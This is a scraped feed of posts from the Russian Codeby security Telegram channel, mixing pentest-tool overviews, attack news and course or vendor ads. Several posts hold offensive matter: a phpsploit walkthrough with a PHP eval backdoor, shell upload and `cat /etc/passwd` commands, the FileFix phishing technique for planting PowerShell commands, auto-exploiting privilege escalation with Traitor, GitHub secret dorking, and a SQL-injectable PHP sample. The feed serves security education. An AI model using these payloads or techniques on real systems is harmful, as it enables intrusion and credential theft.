codeby_sec | Unsorted

Telegram-канал codeby_sec - Codeby

34788

Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278

Subscribe to a channel

Codeby

🟧 Кибератаки усложняются, а уязвимости становятся опаснее. Стандарты тестирования на проникновение помогают выявлять даже скрытые уязвимости, обеспечивая комплексную проверку безопасности.

Читать полностью…

Codeby

FileFix как альтернатива ClickFix. ClickFix — это атака методом социальной инженерии, которая побуждает пользователей неосознанно выполнять вредоносный код на их устройствах, обычно через диалоговое окно «Выполнить», которое вызывается клавишами Windows + R.

Независимый исследователь изобрел более изощренный метод атаки, который позволяет пользователям выполнять команды ОС, не выходя из браузера.

👌Функциональность загрузки файлов в браузере
Для создания кнопки загрузки файлов достаточно input HTML-элемента с атрибутом type и значением file.

<input type="file" />

😨При нажатии на кнопку «Выбрать файл» открывается окно проводника и адресную строку проводника можно использовать для выполнения команд ОС. Оказалось, что это НЕ заблокировано браузером. Например, запуская команду cmd /с ping example.com и глядя на дерево процессов Chrome, видно, что cmd.exe создается одним из многочисленных процессов Chrome.

💥 FileFix атака
Теперь остается придумать предлог, чтобы заставить пользователя вставить туда вредоносную команду. Учитывая, что проводник обычно ассоциируется с доступом к файлам, фишинговая страница может утверждать, что пользователь получил доступ к файлу, и предлагать ему найти его с помощью адресной строки в проводнике.

На фишинговой странице есть кнопка «Открыть проводник», которая при нажатии запускает проводник через функцию загрузки файлов и копирует команду PowerShell в буфер обмена. Очень удобно, что адресная строка может быть автоматически выделена с помощью CTRL + L или ALT + D, поэтому обязательно нужно об этом сказать в пользовательских инструкциях:

Кроме того, вредоносная команда PowerShell объединит фиктивный путь к файлу с комментарием, чтобы скрыть команду и вместо этого отобразить путь к файлу.

Блокировка выбора файла
Пользователь также может намеренно или случайно выбрать файл для загрузки, потому что, в конце концов, это и есть основная функция использования <input type="file">. В коде страницы содержаться строчки блокирующие загрузку, перехватывая событие выбора файла и немедленно очищая поле ввода, отображая сообщение и пытаясь снова открыть окно проводника.

🤛 FileFix2
При дальнейшем тестировании исследователь обнаружил ещё одно интересное поведение, характерное для метода выполнения в проводнике. У исполняемых файлов (например, .exe) при выполнении через адресную строку проводника удаляется атрибут Mark of The Web (MOTW).

Исследователь понял, что это может быть использовано потенциальными злоумышленниками, заставив кнопку «Открыть проводник» загружать файл, копировать %USERPROFILE%\Downloads\payload.exe в буфер обмена и открывать окно проводника. Если предположить, что загруженные файлы сохраняются в %USERPROFILE%\Downloads, это должно запустить полезную нагрузку.

Однако у этого варианта есть недостаток, который следует учитывать. Microsoft Defender и Google Safebrowsing обычно предупреждают пользователей перед сохранением исполняемых файлов, поэтому пользователю может потребоваться сделать больше кликов, чтобы заставить его работать.

Демоверсию представленного варианта атаки можно увидеть здесь.

❗️Учитывая нынешний всплеск атак с использованием ClickFix, нетрудно представить, как эта техника применяется для того, чтобы обманом заставить пользователя неосознанно выполнить вредоносную команду. Стоит отслеживать в браузерах любые подозрительные дочерние процессы (например, cmd.exe, powershel.exe, mshta.exe).

Читать полностью…

Codeby

Telegram Extractor

Telegram Extractor - Это набор скирптов которые помогут анализировать данные хранящиеся в Telegram.

💡Справка:
⏺️tgnet-extractor.py - Извлекает файл files/tgnet.dat, содержащий IP-адреса датацентра, главные секреты и т. д. Этот скрипт анализирует файл и выводит все значения на стандартный вывод
⏺️message-extractor.py - Извлекает сообщения из байтов, хранящихся в столбце SQLite messages.data Telegram.
⏺️encrypted-chat-extractor.py - Извлекает информацию из байтов, хранящихся в sqlite-столбце enc_chats.data Telegram, который содержит основной секретный ключ auth_key секретного чата и другие данные.

📎Установка:

git clone https://github.com/tsusanka/telegram-extractor.git

cd telegram-extractor


📌Использование:
python3 tgnet-extractor.py [PATH_TO_FILE]

python3 message-extractor.py [PATH_TO_FILE]

python3 encrypted-chat-extractor.py [PATH_TO_FILE]


К сожалению, получить доступ к файлу вы должны вручную. По умолчанию, этот файл храниться в /data/data/org.telegram.messenger, но для доступа, видимо, нужен root.

Читать полностью…

Codeby

🗣️ «Без воды, с практикой, с поддержкой»

🗣️ «Весь материал закрепляется на практике, преподаватели реально помогают, а курс — без воды. Чувствуешь, как прокачиваешься с каждым модулем».

🗣️ «Порадовало, что есть тестовые зоны для отработки, и темы реально актуальные — ничего лишнего».


Спасибо за честный и подробный отзыв на курс «Анализ защищенности инфраструктуры на основе технологий Active Directory»!
Мы ценим обратную связь от студентов и всегда рады видеть, что обучение приносит пользу! 😎

📎 Читать полный отзыв

Новый поток стартует с 18 августа!
👉 Присоединиться!

Читать полностью…

Codeby

MITRE Caldera

Платформа, разработанная для упрощения автоматизации имитации действий злоумышленников, помощи красным командам и автоматизации реагирования на инциденты. Создана на основе фреймворка MITRE ATT&CK™ и является активным исследовательским проектом MITRE.

💡Варианты использования
⏺️Автономные действия красной команды
Оригинальный сценарий использования Caldera. Можно использовать этот фреймворк для создания конкретного профиля угрозы (противника) и запустить его в сети, чтобы увидеть, где вы можете оказаться уязвимы. Это подходит для проверки защищенности и обучения синих команд обнаружению угроз.

⏺️Автономное реагирование на инциденты
Автоматическое реагирование на инциденты с помощью развернутых агентов. Это полезно для выявления TTP-атак, которые другие инструменты безопасности могут не замечать или блокировать.

⏺️Выполнение заданий красной команды
Проведение оценки красной команды вручную с использованием агента Manx. Это удобно для замены или дополнения существующих наборов инструментов для оценки вручную, поскольку фреймворк можно расширить с помощью любых имеющихся у вас инструментов.

⏺️Исследования в области искусственного интеллекта
Caldera можно использовать для тестирования искусственного интеллекта и других алгоритмов принятия решений с помощью плагина Mock. Плагин добавляет смоделированных агентов и смоделированные ответы, которые можно использовать для имитации всей операции.

Фреймворк состоит из двух компонентов:
1️⃣ Ядро системы. Это базовый код, состоящий из того, что доступно в репозитории. В него входит асинхронный сервер управления и контроля (C2) с REST API и веб-интерфейсом.

2️⃣ Плагины. Отдельные репозитории расширяют возможности базовой платформы и предоставляют дополнительные функции. В качестве примеров можно привести агентов, отчетность, наборы TTP и многое другое.

💻Установка
Рекурсивно клонируем репозиторий, указав нужную версию/релиз в формате x.x.x. Это позволит получить все доступные плагины. Устанавливаем зависимости и запускаем сервер.

git clone https://github.com/mitre/caldera.git --recursive --tag x.x.x
cd caldera
pip3 install -r requirements.txt
python3 server.py --insecure --build

После запуска необходимо зайти по пути http://localhost:8888, используя учетные данные по умолчанию red/admin. Затем перейти в раздел Plugins -> Training и пройти обучающий курс в стиле CTF, чтобы научиться пользоваться Caldera.

❗️Команда Caldera настоятельно рекомендует размещать сервер Caldera в безопасной среде/сети и не подключать его к интернету. Сервер Caldera не имеет защищенного и тщательно протестированного интерфейса веб-приложения, а только базовые функции аутентификации и безопасности.

Читать полностью…

Codeby

Чем меньше правил, тем крепче сон. Знакомо?

Когда в инфраструктуре десятки межсетевых экранов (NGFW/UTM) от разных вендоров, а их политики безопасности –настоящий лабиринт, где заблудится даже админ. Голова закипает 🤯

Продукт Купол.Управление от вендора НОТА (ИТ-Холдинг Т1) — это мультивендорный контроль, управление сложной сетевой инфраструктурой с возможностью выявить аномалии в политиках межсетевых экранов.

Решение позволяет:
оптимизировать правила в сетевой инфраструктуре,
обеспечить их контроль и соответствие определенным требованиям,
гарантировать безопасность.

Помимо контроля и управления межсетевыми экранами и их правилами, функционал продукта позволяет выявлять правила, которые по тем или иным причинам не сработали.

Купол.Управление — единая платформа для мониторинга, оптимизации и защиты сети.

Возможности системы:
— Подключение и контроль доступности устройств различных вендоров: Cisco,Ideco, Check Point, Fortinet и других.
— Интеграция со сторонними системами управления безопасностью (SIEM, SOAR).
— Создание профилей пользователей и администраторов с гибкой политикой доступа.
— Бэкапирование конфигураций устройств по расписанию.

И это не все. Подробнее о том, как работает Купол.Управление, читайте на сайте: https://kupol.nota.tech/kupol-control

Информация о рекламодателе.

Читать полностью…

Codeby

⚠️ Каждый уровень OSI — потенциальный вход для хакера

Если хотите разобраться, как данные бегают по сети, какие протоколы могут быть атакованы, и что происходит при обычной загрузке сайта — читайте гайд, где мы проходимся по всем 7 уровням модели OSI с примерами, угрозами и практическими выводами для ИБ.

📈 От домена до битов в кабеле — узнаете, где зарыты самые распространённые уязвимости и почему без сетевых знаний вы просто щёлкаете интерфейс, а не проводите пентест.

👉 Читайте и учитесь думать как инженер:
«Основы сетей для начинающих в ИБ: без модели OSI ты слеп»

Разобрались в теории? Вот с чего стоит начать практику:
👉 Курс по компьютерным сетям с 1 сентября — начни обучение этой осенью по скидке!

Читать полностью…

Codeby

🟧Попробуйте разгадать зашифрованные слова из мира пентеста и информационной безопасности.

Помните, «Величайший враг спрячется там, где вы будете меньше всего искать», поэтому ищите лучше!

Делитесь своими ответами и размышлениями в комментариях😎

Читать полностью…

Codeby

Binsider

Binsider — швейцарский нож для реверсёров. Инструмент для анализа бинарных файлов ELF, который предлагает мощные средства статического и динамического анализа.

💡Харакетеристики:
⏺️Статический анализ - Позволяет анализировать структуру ELF, включая секции, сегменты, символы и перемещения.
⏺️Динамический анализ - Возможность выполнения бинарного файла и отслеживания системных вызовов, сигналов и потока выполнения программы.
⏺️Извлечение строк - Подобно команде strings, Binsider может извлекать строки из бинарного файла для поиска интересных данных, таких как URL, пароли и другая чувствительная информация.
⏺️Hexdump - Предоставляет структурированный просмотр бинарного содержимого с возможностью анализа в шестнадцатеричном формате.

📎Установка:

curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh #Установка Rust

sudo apt install cargo

cargo install binsider

sudo cp /home/kali/.cargo/bin/binsider /bin


Использование:
binsider [PATH_TO_BINFILE]

Читать полностью…

Codeby

🚩 Новые задания на платформе HackerLab!

🌍 Категория ВебPDF-библиотека

🎢 Категория РазноеРекурсия

Приятного хакинга!

Читать полностью…

Codeby

phpsploit: Мощный фреймворк для пентеста PHP-приложений

phpsploit - это продвинутый инструмент с открытым исходным кодом, предназначенный для тестирования безопасности веб-приложений на PHP. Он сочетает в себе функции бекдора, шелл-клиента и фреймворка для эксплуатации уязвимостей.


Основные возможности:
➡️ Удалённое выполнение кода (RCE): позволяет загружать и выполнять произвольный PHP-код на целевой системе, поддерживает интерактивную командную строку.
➡️ Стелс-режим: минимизирует следы присутствия в логах и файловой системе, поддерживает шифрование трафика.
➡️ Гибкость и модульность: встроенные модули для сканирования и эксплуатации, возможность написания собственных плагинов на Python.
➡️ Поддержка сессий и многопоточности: сохранение сессий для возобновления работы, параллельное выполнение задач.
➡️ Кросс-платформенность: работает на Linux, Windows и macOS.

⬇️Установка и использование:

1️⃣ Установка phpsploit:
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
pip install -r requirements.txt
./phpsploit


2️⃣ Настройка подключения:
set TARGET http://example.com/vulnerable.php
set BACKDOOR <?php eval($_POST['cmd']); ?>
run exploit


3️⃣ Основные команды:
exploit - запуск эксплойта
shell - интерактивная оболочка
scan file - поиск файлов
download - скачивание файлов
sessions - управление сессиями


4️⃣ Пример эксплуатации:
upload /path/to/shell.php /var/www/html/shell.php
exec "whoami"
exec "cat /etc/passwd"
scan /var/www/html


Применение в безопасности:
- Тестирование на уязвимости RCE в PHP-приложениях
- Пост-эксплуатация после успешного взлома
- Аудит веб-серверов на наличие бекдоров

Читать полностью…

Codeby

👍 GitDorker

Инструмент, написанный на Python, который использует GitHub Search API и обширный список GitHub-дорков, составленных из различных источников, для поиска конфиденциальной информации, хранящейся на GitHub.

Основной целью является предоставление пользователю чистой и адаптированной поверхности атаки для сбора конфиденциальной информации на GitHub. GitDorker можно использовать с дополнительными инструментами, такими как GitRob или Trufflehog, для получения более точных результатов.

❗️Инструмент из-за использования GitHub Search API ограничен 30 запросами в минуту. Для предотвращения сбоев в него встроена функция ожидания после каждых 30 запросов.

📁 В папке Dorks находится список дорков. Рекомендуется использовать файл medium_dorks.txt при работе с инструментом. Данный файл содержит в общей сложности 240 отдельных дорков с различных ресурсов.

Для работы с инструментом также потребуется персональный токен GitHub. Установка осуществляется через следующие команды:

git clone https://github.com/obheda12/GitDorker.git
cd GitDorker
pip3 install -r requirements.txt


✔️Пример использования
Представленный ниже запрос будет искать информацию связанную с "codeby".
python3 GitDorker.py -tf TOKENSFILE -q codeby -d Dorks/DORKFILE -o output.txt

⏺️-tf импорт токена;
⏺️-q указывает на сам запрос;
⏺️-d содержит путь до словаря с дорками;
⏺️-o выходной файл с результатами.

Кроме того можно указать дополнительную информацию с помощью флагов -org, -u и т.д., чтобы сузить диапазон поиска и увеличить количество шансов на успех.

Читать полностью…

Codeby

Сеть алкомаркетов «Винлаб» столкнулась с беспрецедентным инцидентом. Приостановлена работа всех магазинов «Винлаб».

Причиной стал масштабный взлом корпоративных серверов, который продолжает парализовывать бизнес-процессы компании уже третий день подряд.

Последствия атаки:
🟣Все розничные точки остаются закрытыми, на дверях размещены уведомления о «технических работах» без конкретных сроков возобновления деятельности
🟣Официальный сайт сети недоступен
🟣Клиенты столкнулись с «зависшими» заказами — оплаченный заказ не доставляется и статусы не обновляются

❗️Владелец сети (Novabev Group) пока не даёт официальных комментариев. По данным инсайдеров, хакеры потребовали выкуп, но руководство отказалось выполнять их условия.

Читать полностью…

Codeby

Как защитить пароль от реверса: антиотладка, XOR и прыжки в бездну

Если в вашей программе есть CMP + JE — её уже взломали.
Но что если заменить проверку пароля на хаотичные прыжки, шифрование и ложные исключения?

В статье разберем нестандартные способы защиты:
⚪️Пароль = ключ дешифровки — без него код просто не соберётся.
⚪️Ловушки для отладчика — SEH, антитрассировка и ложные CMP.
⚪️Самомодифицирующийся код — программа меняет себя при каждом запуске.
⚪️Пароль из кусочков — собирается только в памяти и никогда не хранится целиком.

📍Чем больше хаоса, тем меньше шансов у реверсера.

➡️Читайте подробнее в новой статье!

Читать полностью…

Codeby

🟧Перед вами профессиональный кроссворд для пентестеров и security-специалистов. Здесь собраны ключевые термины из мира взлома и защиты.
Решите его и напишите спрятанное слово в комментариях!

Читать полностью…

Codeby

🚩 Новые задания на платформе HackerLab!

🔎 Категория OSINTМировая знаменитость

🌍 Категория ВебТссс, 9.2.2.3!
——————————————

🗂 В архив добавлены задания с прошлых соревнований + райтапы:

🟠Реверс-инжиниринг - Обычная капибара
🟠Стеганография - Письмо Деду Морозу

Приятного хакинга!

Читать полностью…

Codeby

Traitor: Утилита для автоматизации повышения привилегий в Linux

Traitor — это инструмент с открытым исходным кодом, созданный для автоматизированного поиска и использования уязвимостей, позволяющих повысить привилегии в Linux-системах. Разработанный для пентестеров и специалистов по безопасности, Traitor автоматизирует сложные задачи, связанные с эскалацией прав, и помогает выявлять потенциальные угрозы в инфраструктуре.


⚡️ Основные возможности Traitor
➡️ Автоматизированный анализ системы:
• Сканирование на наличие потенциальных путей эскалации привилегий.
• Проверка на уязвимые бинарные файлы с правами SUID/SGID.
• Обнаружение нестандартных настроек sudo и cron.
➡️ Автоматическая эксплуатация уязвимостей:
• Использует известные эксплойты для повышения привилегий.
• Выполняет атаки на основе обнаруженных проблем конфигурации.
➡️ Информативный вывод:
• Предоставляет подробные отчёты о найденных уязвимостях.
• Предлагает рекомендации по устранению проблем.
➡️ Поддержка популярных векторных атак:
• Обнаружение уязвимостей в настройках PATH.
• Проверка на небезопасные монтирования файловых систем.
• Использование некорректно настроенных бинарных файлов.
➡️ Кроссплатформенность:
• Работает на большинстве дистрибутивов Linux.


⬇️ Установка и использование

1️⃣ Скачивание готового бинарного файла
Разработчики предоставляют готовые сборки Traitor для различных платформ. Чтобы установить последнюю версию:
➡️ Перейдите на страницу релизов.
➡️ Скачайте версию, соответствующую вашей операционной системе:
• traitor-amd64 для Linux на архитектуре x86_64.
• traitor-arm64 для ARM-устройств.
➡️ Сделайте файл исполняемым:
chmod +x traitor


2️⃣ Запуск анализа:
Для поиска путей повышения привилегий выполните:
./traitor


3️⃣ Автоматическая эксплуатация:
Чтобы сразу попытаться использовать найденные уязвимости:
./traitor -a


4️⃣ Дополнительные параметры:
Просмотрите все доступные флаги:
./traitor --help

Читать полностью…

Codeby

👯‍♀️Сигма, сигма… правила!

Sigma rule - это правила корреляции для обнаружения подозрительных или вредоносных событий в логах информационных систем, написанное в специальном унифицированном формате Sigma.

🔎 Sigma-правила описываются на языке YAML и состоят из структурированных блоков: метаинформации, источника логов (logsource) и условий детектирования (detection).

🖥 Главная особенность Sigma - независимость от конкретной SIEM-системы: одно правило можно автоматически конвертировать в запросы для разных SIEM-платформ (например, Splunk, Elastic, ArcSight), что облегчает обмен знаниями и ускоряет внедрение новых сценариев обнаружения угроз. Sigma-правила активно используются для автоматизации выявления атак и инцидентов информационной безопасности.

↔️ Благодаря независимости от конкретного продукта, Sigma-правила приняты за стандарт по обмену знаний и взаимодействию с другими специалистами по информационной безопасности (в частности, TI и IR специалистами) в области обнаружения кибератак. Некоторые из вендоры в своих отчетах по расследованию APT-группировках помимо индикаторов компрометации, описывают Sigma-правила для внедрения в свою инфраструктуру.

⤵️ Совсем скоро мы подробно окунемся в структуру Sigma-правил, а пока что в комментариях попробуйте угадать, в каком российском продукте используются Sigma-правила

Читать полностью…

Codeby

FLARE-FLOSS: Детектор скрытых угроз в бинарных файлах

Представьте, что перед вами скомпилированная программа — тёмный лес из байтов, где могут прятаться зловредные строки, пароли, URL-адреса вредоносных серверов или даже целые скрипты. Как их найти, если исходного кода нет?

FLARE-FLOSS (Fast Library Acquisition for String Sections) — инструмент от Mandiant (ныне часть Google Cloud), который вытаскивает спрятанные строки из исполняемых файлов, даже если они зашифрованы или обфусцированы.


🔴 Зачем нужен FLOSS?
Многие вредоносные программы (и даже легальные приложения) прячут важные строки:
▪️Команды для C2-серверов
▪️Ключи шифрования
▪️Ссылки на дополнительные payload-ы
▪️Системные пути и имена процессов для антиотладки
Обычные утилиты вроде strings не всегда справляются, особенно если данные закодированы или динамически собираются в памяти. FLOSS решает эту проблему, применяя статический анализ и эмуляцию кода.

⤵️ FLOSS использует три метода извлечения строк:
▪️Обычный поиск (как `strings`) – находит ASCII и Unicode-строки.
▪️Анализ стековых строк – восстанавливает строки, которые собираются в рантайме (например, через mov или `push`).
▪️Эмуляция кода – выполняет статическую эмуляцию, чтобы выявить строки, которые создаются динамически.

📍 Допустим, у нас есть вредоносный файл malware.exe. Запустим FLOSS:
floss malware.exe

И увидим что-то вроде:
...
0x401020: http://malicious-server.com/payload.bin
0x4020A0: ThisIsASecretKey123
0x4033F0: C:\Windows\System32\wscript.exe
...

Эти строки могли быть скрыты от обычного strings, но FLOSS их нашёл!

📍 Установка и использование
Способ 1: Через pip
pip install flare-floss


Способ 2: Из исходников
git clone https://github.com/mandiant/flare-floss  
cd flare-floss
python3 setup.py install


Проверим установку
floss --version


Базовые команды
# Простой анализ  
floss suspicious_file.exe

# Только статические строки (без эмуляции)
floss --no-static-strings malware.bin


🔴 Иногда могут возникать проблемы из-за конфликтов в окружении. Создайте чистое виртуальное окружение и используйте FLOSS дальше:
python3 -m venv ~/floss-venv
source ~/floss-venv/bin/activate
pip install flare-floss

Читать полностью…

Codeby

💿 OSINT в багхантинге: зачем багхантеру разведка?

Вы можете быть мастером эксплуатации, но если не знаете, где копать — ничего не найдете.
Всё начинается с OSINT: поддомены, утекшие ключи, старые Jenkins, забытые API — всё это может быть входом.

В новой статье рассказываем:
🟧 как багхантер собирает карту инфраструктуры без единого запроса к серверу;
🟧 какие утечки ищут в GitHub и Google Dorks;
🟧 как искать реальные уязвимости через Shodan и HaveIBeenPwned;
🟧 почему OSINT — это не “дополнительно”, а фундамент атаки.

И да, всё на реальных кейсах.
🟧 Ныряем в багхантинг с головой — читайте статью!

Хотите так же анализировать инфраструктуру цели, находить утечки и строить полноценные OSINT-цепочки?
🟧 Разберитесь в инструментах и подходах на практическом курсе по OSINT. Начать обучение сейчас

Читать полностью…

Codeby

Arch Linux удалил три пакета из AUR, распространявших троян CHAOS

1️⃣В чём суть?
В популярном репозитории AUR (Arch User Repository), который используется миллионами пользователей Arch Linux и производных дистрибутивов (Manjaro, EndeavourOS и др.), обнаружен вредоносный пакет. Злоумышленники внедрили в него троян CHAOS, способный похищать конфиденциальные данные пользователей.

2️⃣Как назывались эти пакеты?
librewolf-fix-bin, firefox-patch-bin и zen-browser-patched-bin загружали вредоносный код с GitHub.

3️⃣Что за троян CHAOS?
CHAOS RAT — это троян удаленного доступа с открытым исходным кодом, разработанный для Windows и Linux. Он может: 1)Загружать и скачивать файлы. 2) Выполнять произвольные команды. 3) Открывать обратную оболочку для удаленного управления.

4️⃣Чем всё закончилось?
Пакеты были загружены 16 июля пользователем с ником danikpapas и успели повисеть в AUR два дня, после чего Arch Linux оперативно их удалила.

📌Рекомендации для пользователей!
Если вы устанавливали данные пакеты, срочно исполните следующие инструкции:
1) Проверите систему на наличие подозрительного исполняемого файла systemd-initd, который может находиться в директории /tmp.
2) Убедесь, что система не была скомпрометирована, проверив сетевые подключения и другие признаки вредоносной активности.

Читать полностью…

Codeby

Платформа DION — это не просто альтернатива привычным мессенджерам и видеосвязи. Это решение, где информационная безопасность встроена на уровне архитектуры.

Варианты размещения:

— Гибридное. Позволяет выносить медиатрафик и критичную информацию в контур заказчика.
— On-Premise. Развёртывание на стороне заказчика, локальное хранение, максимальная изоляция.

💻 Что важно для ИБ-специалистов:

— Шифрование и MFA.
— Интеграция с DLP и SIEM.
— Гибкий контроль доступа. Ролевые политики, настройка по отделам, проектам и уровням доступа.
— Безопасное хранение, резервное копирование и устойчивость к атакам.
— Обучение сотрудников для снижения человеческого фактора.

📌 DION — это не надстройка, а изначально безопасная UC-платформа.

Как её уже используют лидеры рынка?

🔘Один из ТОП-5 банков проводит 15 000+ защищённых конференций в день
🔘Крупнейший медиахолдинг применяет DION для прямых включений корреспондентов
🔘Ведущая авиакомпания сократила время переключения между каналами и бронирует переговорки через DION.Rooms

📤 Попробуйте бесплатно.
Для компаний от 120+ пользователей — спецусловия.

Информация о рекламодателе.

Читать полностью…

Codeby

Ваши данные уже в сети. Вы уверены, что они в безопасности?

Знаете ли вы, что:
- 92% людей даже не подозревают, какая информация о них есть в открытом доступе
- Ваши старые аккаунты на форумах и в соцсетях до сих пор можно найти
- Фото с геометками из отпуска 5-летней давности могут указать ваш домашний адрес
- Пароли из утечек 2010-х годов до сих пор используют для взлома аккаунтов

Ваши данные уже ищут — научитесь защищаться!
Что даст курс:
- Поиск своих "утекших" данных
- Удаление личной информации из сетей
- Настройки приватности, которые работают
- Методы безопасного серфинга

92% людей не контролируют свой цифровой след — будьте в меньшинстве!
🔴 Начать обучение запись до 31 июля!

По всем вопросам @Codeby_Academy

Читать полностью…

Codeby

Пентестеру важно понимать DNS и его записи, чтобы выявлять инфраструктуру, скрытые сервисы и уязвимости, проверять защиту почты и находить возможности для атак. Это помогает эффективно планировать атаки и искать слабые места в безопасности.

Читать полностью…

Codeby

Взламываем мифы о безопасности Android

Знаете ли вы:

🟧85% мобильных приложений содержат критические уязвимости (отчет OWASP 2024)
🟧Каждое 3-е приложение в Google Play имеет уязвимости, связанные с хранением данных (исследование Positive Technologies).
🟧Атаки на Android выросли на 50% за последние 2 года — (данные Kaspersky Lab), пора научиться защищаться!

На курсе Анализ защищённости приложений Андроид за 3,5 месяца освоите реальные инструменты защиты:⬇️
Разберете Android-приложения изнутри
Освоите инструменты статического и динамического анализа
Научитесь находить и устранять уязвимости на практике

21 июля старт обучения:
мини-группа до 8 человек + персональный разбор заданий

🟠Успейте записаться

Курс создан для:
Сотрудников подразделений ИБ для повышения квалификации, новичков в сфере анализа мобильных приложений, реверс-инженеров для повышения квалификации в области мобильных приложений

🚀 По всем вопросам пишите @Codeby_Academy

Читать полностью…

Codeby

Extirpater

Extirpater - мощный инструмент для полного уничтожения данных на Android-устройстве без возможности восстановления.

💡Харакетеристики:
В отличие от стандартного удаления, при котором файлы просто удаляются из индекса файловой системы, Extirpater гарантирует, что ваши данные не подлежат возврату. Он заполняет свободное пространство случайными данными, а затем полностью очищает его, делая восстановление невозможным.

📎Установка:
👩‍💻Проект доступен в магазине F-droid:

https://f-droid.org/packages/us.spotco.extirpater/

👩‍💻Исходный код:
https://github.com/divested-mobile/extirpater


📌Использование:
Выбирете Primary или Secondary Storage и нажмите кнопку Start.

Читать полностью…

Codeby

pspy: Утилита для мониторинга процессов без привилегий root

pspy — это лёгкий и мощный инструмент с открытым исходным кодом, который позволяет отслеживать процессы на Linux-системах без необходимости обладания правами root. Это идеальный инструмент для анализа выполнения задач в реальном времени, поиска уязвимостей и оптимизации системных процессов.


Основные возможности pspy
➡️ Мониторинг процессов в реальном времени:
• Улавливает все запуски команд и скриптов.
• Фиксирует информацию о процессах, выполняемых пользователями и системными службами.
➡️ Отслеживание задач cron:
• Помогает выявить выполняемые задачи cron и понять их расписание.
• Удобен для тестирования безопасности и выявления слабых мест.
➡️ Поддержка работы без root:
• Не требует установки или повышения привилегий.
• Идеален для использования в условиях ограниченного доступа.
➡️ Совместимость с различными архитектурами:
• Доступен для x64, x86, ARM и других платформ.
➡️ Лёгкость и портативность:
• Выполняется как один бинарный файл без дополнительных зависимостей.

⬇️ Установка и использование

1️⃣ Скачивание pspy:
Загрузите подходящую версию с GitHub:
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
chmod +x pspy64


2️⃣ Запуск мониторинга:
Для наблюдения за процессами выполните:
./pspy64


3️⃣ Фильтрация событий:
Используйте встроенные флаги и фильтры, чтобы сузить список отслеживаемых процессов:
./pspy64 | grep cron

Читать полностью…

Codeby

📱 Google выпустил срочное обновление, закрывающее шесть критических уязвимостей в браузере Chrome. Среди них особую опасность представляет CVE-2025-6558 (оценка 8.8 по шкале CVSS), которая уже активно используется злоумышленниками в реальных атаках.

Суть проблемы кроется в компонентах ANGLE (Almost Native Graphics Layer Engine) и GPU браузера. ANGLE выполняет важную функцию - это промежуточный слой между движком рендеринга Chrome и графическими драйверами устройства. Ошибка в проверке входящих данных позволяет злоумышленникам осуществить так называемый «побег из песочницы».


🟧 Что это означает на практике?
- Достаточно просто открыть специально созданную веб-страницу
- Никаких дополнительных действий от пользователя не требуется
- Атакующий получает возможность выйти за пределы изолированной среды браузера
- Появляется риск полного компрометирования системы

🟧 Особую тревогу вызывает факт обнаружения этой уязвимости специалистами Google Threat Analysis Group (TAG) - подразделения, которое занимается расследованием сложных кибератак, часто связанных с деятельностью государственных хакерских группировок. Уязвимость была зафиксирована 23 июня 2025 года, но Google подтверждает, что эксплойты уже используются в реальных атаках.

🟧Это уже пятая критическая уязвимость в Chrome с начала 2025 года, которую эксплуатируют злоумышленники:
🟧CVE-2025-2783 - ошибка в логике на пересечении Chrome и операционной системы Windows, которая позволяет обойти защиту песочницы браузера.
🟧CVE-2025-4664 - случай недостаточного обеспечения соблюдения политики в компоненте под названием Loader.
🟧CVE-2025-5419 - уязвимость чтения и записи за пределами в движке V8 JavaScript и WebAssembly.
🟧CVE-2025-6554 - недостаток путаницы типов в движке V8 JavaScript и WebAssembly.
🟧Текущая CVE-2025-6558 - неправильная проверка ненадежного ввода в компонентах ANGLE и GPU браузера.

🟧 Что делать?
- Обновите Chrome до версии 38.0.7204.157/.158 (для Windows и macOS) и 138.0.7204.157 (для Linux)
Проверить наличие обновлений можно через меню: «Еще» > «Справка» > «О Google Chrome»

- Не забывайте, что аналогичные обновления необходимо устанавливать и для других браузеров на базе Chromium: Edge, Brave, Opera, Vivaldi

Читать полностью…

Codeby

Intellifuzz

Intellifuzz - умная AI-powered обёртка для веб-фаззера ffuf. Автоматически анализирует цель и предлагает оптимальные расширения файлов для фаззинга, используя силу искусственного интеллекта от ведущих провайдеров.

💡Харакетеристики:
⏺️Множественные AI-провайдеры - OpenAI, Anthropic Claude, Ollama (локально), OpenRouter.
⏺️Управление конфигурацией - YAML-конфиг с интерактивной настройкой.
⏺️Интеграция с ffuf - Пропускает все параметры ffuf без изменений.
⏺️Умные предложения - Контекстно-зависимые рекомендации расширений файлов.
⏺️Гибкая аутентификация - API-ключи, переменные окружения, локальные модели.

📎Установка:

git clone https://github.com/cansolele/intellifuzz

cd intellifuzz

pip install -r requirements.txt

Заходим на сайт openAI под другой страной и в API Platforms, в настройках пользвателя cоздаём секретный ключ, называем проект как угодно и вставляем его в файл config.yaml


📌Использование:
python intellifuzz.py https://google.com


Удовольствие такое не бесплатное, за использование API просят плату

Читать полностью…

Codeby

Graudit: инструмент для поиска уязвимостей в коде

Graudit (Grep Rough Audit) — это инструмент для статического анализа безопасности исходного кода, который использует сигнатурный поиск на основе регулярных выражений. Он помогает находить потенциальные уязвимости, такие как SQL-инъекции, XSS, RCE, path traversal и другие. Graudit отличается простотой, высокой скоростью работы и поддержкой множества языков программирования.


🟧 Установка Graudit
Graudit можно установить из репозитория:
git clone https://github.com/wireghoul/graudit
cd graudit
sudo cp graudit /usr/local/bin/ # Добавляем в PATH
Проверяем:
graudit -v

🟧 Как работает Graudit?
Graudit анализирует исходный код, используя предопределённые наборы правил (сигнатуры), которые соответствуют распространённым уязвимостям.
Поддерживаемые языки:
🟧 PHP, Java, Python, Ruby
🟧 C/C++, Go, JavaScript
🟧 Bash, Perl, ASP
Файлы с сигнатурами хранятся в папке /signatures/.

🟧 Примеры использования
1. Базовое сканирование
Проверим PHP-код на уязвимости:
graudit -d php ./project/

Вывод будет содержать строки кода, похожие на уязвимые паттерны.
2. Поиск SQL-инъекций
graudit -d sql ./project/
3. Проверка JavaScript (Node.js) на XSS
graudit -d js ./app.js


🟧 Пример уязвимого кода и его анализ
🟧 PHP: SQL-инъекция
// Уязвимый код
$user = $_GET['username'];
$query = "SELECT * FROM users WHERE name = '$user'";
$result = mysqli_query($conn, $query);

